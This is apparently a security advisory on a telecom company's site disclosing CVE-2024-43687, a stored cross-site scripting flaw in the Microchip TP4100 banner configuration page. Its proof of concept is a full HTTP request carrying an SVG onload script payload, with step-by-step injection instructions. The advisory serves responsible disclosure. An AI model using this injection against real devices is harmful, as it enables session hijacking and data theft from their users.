La Sostenibilità per TIM

Il Report 2024 accoglie i principi della Corporate Sustainability Reporting Directive (CSRD) ed è incluso nella Relazione Finanziaria e di Sostenibilità. Approfondisci

Ultimi Comunicati Stampa

Redazione ufficio stampa

Leggi gli ultimi comunicati stampa e naviga nell'archivio dell'Ufficio Stampa del Gruppo TIM. Leggi i comunicati

CVE-2024-43687

CVE-2024-43687 – Microchip TP4100

Vulnerability Description: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') - CWE-79

Software Version: 2.3.12

NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-43687

CVSS: 6.1

Severity: Medium

Credits: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli

The field "Custom Banner" in tab "Banner config" has been found vulnerable to stored cross-site scripting (XSS) attacks. The script injected is executed by the browser when a user visits the banner page. This type of XSS is particularly dangerous because the malicious code is saved by the device and the commands are executed for any user that loads the page, until the device is reset.

 

Step-by-step instructions and PoC

A user, authenticated to the web application, can insert javascript code in the banner configuration.

Affected Endpoints

•                URL: http://<device_IP>/bannerconfig

•                HTTP Parameter: txtcustom

Below the evidence with the vulnerability details and the payloads used.

Payload used to exploit the vulnerability:

POST /bannerconfig HTTP/1.1

Host: <device_IP>

Cookie: ci_session=2e5d6db87cf9104d4b8bfd4951665c2b96fffc24

Content-Length: 477

Cache-Control: max-age=0

Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"

Sec-Ch-Ua-Mobile: ?0

Sec-Ch-Ua-Platform: "Linux"

Upgrade-Insecure-Requests: 1

Origin: https://<device_IP>

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryayaMItq0sXj5hiI2

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

Sec-Fetch-Site: same-origin

Sec-Fetch-Mode: navigate

Sec-Fetch-User: ?1

Sec-Fetch-Dest: document

Referer: https://<device_IP>/bannerconfig

Accept-Encoding: gzip, deflate, br

Accept-Language: en-US,en;q=0.9

Priority: u=0, i

Connection: close

 

------WebKitFormBoundaryayaMItq0sXj5hiI2

Content-Disposition: form-data; name="user_level"

 

1

------WebKitFormBoundaryayaMItq0sXj5hiI2

Content-Disposition: form-data; name="bannerradio"

 

CUSTOMIZED

------WebKitFormBoundaryayaMItq0sXj5hiI2

Content-Disposition: form-data; name="txtcustom"

 

<svg onload=alert(1000000)>

 

------WebKitFormBoundaryayaMItq0sXj5hiI2

Content-Disposition: form-data; name="action"

 

applybanner

------WebKitFormBoundaryayaMItq0sXj5hiI2—

 

After logging, go to the panel ‘Admin’ -> ‘Banner Config’. Select ‘Custom Banner’ and insert the following javascript payload:

        <svg onload=alert(1000000)>

Figure 7: Add javascript payload

Click To Enlarge

Then click ‘Apply’. Finally, the javascript code is executed in the banner page at ‘https://<device_IP>’

Figure 8: Stored Cross-site Scripting

Click To Enlarge

Security Impact

By using malicious javascript code the attacker may be able to perform privileged operations on behalf of the user or gain access to sensitive data belonging to the user. The attacker could: transfer private information from the victim's machine to the attacker, send malicious requests to a web site on behalf of the victim.